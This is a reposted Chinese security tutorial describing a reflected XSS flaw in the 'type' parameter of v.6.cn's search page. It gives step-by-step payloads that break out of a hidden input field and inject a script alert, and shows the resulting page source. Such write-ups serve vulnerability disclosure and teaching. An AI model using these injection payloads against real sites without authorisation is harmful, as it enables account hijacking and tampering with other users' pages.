网站地图    收藏   

主页 > 后端 > 网站安全 >

6间房(6.cn)XSS反射型漏洞 - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-17 11:59 作者: 阅读:

[导读] Author:H3artData:Jan 16,2013漏洞页面:http://v.6.cn/search.php?keytype=现在type后面随便填写一个,然后再查看源码。http://v.6.cn/search.php?keytype=xssa rel=nofollow id=itoPlay target=......

Author:H3art
Data:Jan 16,2013

漏洞页面:http://v.6.cn/search.php?key&type=
现在type后面随便填写一个,然后再查看源码
 http://v.6.cn/search.php?key&type=xss

 <a rel="nofollow" id="itoPlay" target="_blank" class="toPlay" href="http://v.6.cn/logins.php">开始直播</a> 
    <div class="search">
      <form name="search" method="get" action="http://v.6.cn/search.php" onsubmit="return searchBox.submit(this)">
<input type="hidden" name="type" autocomplete="off" value="xss" id="input_type" />
        <div class="searchBox"> <span class="soInput">
          <input type="text" name="key" value=""/>
          </span>
          <div id="so_option" class="soOption" onclick="searchBox.setOption()"><a class="soType"><span id="so_type">用户</span><em> </em></a>
<div class="soTypeList">

从 <input type="hidden" name="type" autocomplete="off" value="xss" id="input_type" />分析。而这个xss就是我们刚才输入的值。可见value是控制用户输入的。下面我们在里面输入xss“>把前面的input闭合一下。
\
<a rel="nofollow" id="itoPlay" target="_blank" class="toPlay" href="http://v.6.cn/logins.php">开始直播</a> 
    <div class="search">
      <form name="search" method="get" action="http://v.6.cn/search.php" onsubmit="return searchBox.submit(this)">
<input type="hidden" name="type" autocomplete="off" value="xss">" id="input_type" />
        <div class="searchBox"> <span class="soInput">
          <input type="text" name="key" value=""/>
          </span>
          <div id="so_option" class="soOption" onclick="searchBox.setOption()"><a class="soType"><span id="so_type">用户</span><em> </em></a>
<div class="soTypeList">
 

大家可以看到 当你闭合之后 后面的  " id="input_type" />就在页面显示出来了。
我们输入xss”><script>alert("xss by H3art")</script>
\
再分析一下源代码
 <a rel="nofollow" id="itoPlay" target="_blank" class="toPlay" href="http://v.6.cn/logins.php">开始直播</a> 
    <div class="search">
      <form name="search" method="get" action="http://v.6.cn/search.php" onsubmit="return searchBox.submit(this)">
<input type="hidden" name="type" autocomplete="off" value="xss"><script>alert("xss by H3art")</script>" id="input_type" />
        <div class="searchBox"> <span class="soInput">
          <input type="text" name="key" value=""/>
          </span>
          <div id="so_option" class="soOption" onclick="searchBox.setOption()"><a class="soType"><span id="so_type">用户</span><em> </em></a>
<div class="soTypeList">
接着输入 xss”><script>alert("xss by H3art")</script><input type="xss" name="xss
\
 <a rel="nofollow" id="itoPlay" target="_blank" class="toPlay" href="http://v.6.cn/logins.php">开始直播</a> 
    <div class="search">
      <form name="search" method="get" action="http://v.6.cn/search.php" onsubmit="return searchBox.submit(this)">
<input type="hidden" name="type" autocomplete="off" value="xss"><script>alert("xss by H3art")</script><input type="xss" name="xss" id="input_type" />
        <div class="searchBox"> <span class="soInput">
这个漏洞可以说跟 前段时间 土豆网爆出的xss 一样。。

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论